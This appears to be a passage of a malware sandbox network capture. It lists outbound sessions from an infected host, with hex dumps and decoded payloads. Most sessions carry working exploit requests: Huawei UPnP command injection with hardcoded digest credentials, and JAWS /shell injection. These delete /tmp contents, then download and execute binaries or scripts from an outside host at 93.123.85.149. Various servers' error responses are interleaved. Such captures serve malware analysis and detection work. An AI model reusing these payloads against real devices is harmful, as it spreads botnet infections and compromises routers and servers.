                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            246192.168.2.2358472162.93.56.13780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.468729973 CET42INData Raw: 42 49 47 2d 49 50 3a 20 5b 30 78 32 63 32 35 33 30 64 3a 32 34 39 31 5d 20 4e 6f 20 6c 6f 63 61 6c 20 6c 69 73 74 65 6e 65 72
                                                            Data Ascii: BIG-IP: [0x2c2530d:2491] No local listener


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            247192.168.2.234936241.44.41.6737215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.468920946 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:31:52.779158115 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            248192.168.2.235896899.84.164.15780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.668950081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:52.786232948 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            249192.168.2.2339522104.25.138.5780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.670365095 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            250192.168.2.233554047.135.166.18380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.672905922 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:52.799043894 CET500INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:31:53 GMT
                                                            Server: HTTP Server
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            251192.168.2.234113464.44.24.19980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.674015999 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:52.795962095 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            252192.168.2.2333814138.68.44.23280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.709758043 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:52.867177010 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Server: Apache/2.4.18 (Ubuntu)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            253192.168.2.235972238.165.19.5980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.717869997 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:52.883544922 CET454INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Data Raw: 66 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 62 6f 6f 74 73 63 64 6e 73 2e 6f 72 67 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 36 2e 34 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: fd<html><head><title>404 Not Found</title><script type="text/javascript" src="https://cdn.bootscdns.org/ajax/libs/jquery/3.6.4/jquery.js"></script></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            254192.168.2.235272420.71.11.13080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.747621059 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            255192.168.2.234892235.177.178.23880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.755300999 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            256192.168.2.2348622104.107.160.19980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.877494097 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.087794065 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 34 65 66 31 39 62 38 26 23 34 36 3b 31 37 30 36 32 37 39 35 31 32 26 23 34 36 3b 31 39 35 62 39 35 39 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;34ef19b8&#46;1706279512&#46;195b9591</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            257192.168.2.2338044156.77.134.8237215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.879040956 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            258192.168.2.234316452.16.167.22080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.881131887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.096697092 CET401INHTTP/1.1 301 Moved Permanently
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:31:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 134
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            259192.168.2.2357384109.104.144.9880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:52.901761055 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:53.135119915 CET903INHTTP/1.1 400 Bad Request
                                                            content-type: text/html
                                                            cache-control: private, no-cache, max-age=0
                                                            pragma: no-cache
                                                            content-length: 679
                                                            date: Fri, 26 Jan 2024 14:31:53 GMT
                                                            server: LiteSpeed
                                                            connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 